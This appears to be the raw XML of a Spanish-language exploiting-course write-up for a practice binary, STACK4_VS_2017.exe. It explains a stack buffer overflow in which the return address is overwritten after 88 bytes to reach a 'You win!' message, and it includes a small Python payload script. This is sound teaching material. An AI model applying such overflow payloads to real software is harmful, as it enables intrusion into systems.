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  <w:t xml:space="preserve">Resuelto el 3 pasamos al cuarto :P y como vemos la primera parte es todo igual, se sigue reservando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0s54 (80) bytes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, se llama un MessageBox y se imprimen las direcciones del </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> y de la </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie.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867275" cy="20859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085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  <w:t xml:space="preserve">Lo único que cambio es en la comparación de la cookie, que como vemos ahora es </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0D0A00.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  <w:t xml:space="preserve">En litle endian seria algo como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">00  0A  0D  00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194263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1885950" cy="2828925"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="11430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28289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0x00 : Carácter nulo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0x0A: Nueva línea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0x0D: retorno de carro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Como ya vimos, el carácter nulo no nos va afectar, pero ahí tenemos un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (newline) que si nos afectara cortando la cadena -.- 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  <w:t xml:space="preserve">Una solución posible es pisar el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">retn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 y hacer que salte directamente al mensaje de “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">you win!”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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">¿Como hacemos esto?¿</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pues bien, desbordamos el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> hasta pisar la dirección de retorno :P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Nos vamos a la pila y seleccionamos hasta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s (base pointer)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para ver la cantidad de bytes que hay hasta ahí, con clic derecho y </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">array</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> podemos verlo.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9243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2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  <w:t xml:space="preserve">Entonces después de 88 bytes tenemos que poner la dirección a la cual queremos que salte nuestro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">retn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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">y esta dirección es </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00401084</w:t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029200" cy="13430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343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  <w:t xml:space="preserve">De esta forma se imprimirá el mensaje de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“You win!”</w:t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sys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subprocess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Popen, PIPE</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">buffer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b"A"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*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80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cookie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b"B"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*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s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b"C"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*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r = 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b"\x84\x10\x40\x00"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  <w:t xml:space="preserve">payload = buffer + cookie + s + r</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">p1 = Popen(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"STACK4_VS_2017.exe"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stdin=PIPE)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"PID: %s"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% hex(p1.pid))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"Enter para continuar"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br w:type="textWrapping"/>
              <w:t xml:space="preserve">p1.communicate(payload)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">p1.wait()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">input()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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3648075" cy="85725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857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Ejercicio anterior </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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03 Stack Nro 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Ejercicio siguiente </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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05 - STACK 2 x64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docs.google.com/document/d/1f4_MbTtzIt03H4hTP_0T-LWgD44xoxzf70-OgCmvWz8/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1XsnCZYtYih_n4xXtP_bX08aVRewBSdFAfJSzY4kdagU/edit?usp=sharing" TargetMode="Externa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